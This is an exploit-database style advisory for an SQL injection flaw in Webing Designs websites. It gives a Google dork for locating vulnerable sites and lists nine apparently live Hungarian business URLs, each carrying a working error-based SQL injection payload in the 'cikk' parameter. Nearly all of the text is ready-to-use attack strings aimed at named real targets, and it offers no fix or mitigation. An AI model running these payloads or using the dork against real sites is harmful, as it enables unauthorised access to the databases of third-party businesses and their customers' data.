###################### # Exploit Title : Webing Designs SQL Injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://webing.hu/ # Google Dork : "Webáruház és közösségi portál készítés:" # Date: 03 02 2016 # Tested On :Windows 7 /FireFox ###################### # demos and explanations: #http://mhkk.hu/index.php?oldal=1&cikk=487'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.pizza-rendeles-miskolc.hu/?oldal=1&cikk=40'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.konkurenciaharc.hu/?oldal=1&cikk=86'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.drjuice.info/?oldal=1&cikk=487'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.donpedropizza.hu/?oldal=1&cikk=456'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.egeszsegesgyerekek.hu/?oldal=1&cikk=418'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.hbz.hu/?oldal=1&cikk=40'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://remaxhungary.com/?oldal=1&cikk=407'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - #http://www.deviltuning.hu/?oldal=1&cikk=40'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - ###################### # discovered by : Amir.ght ######################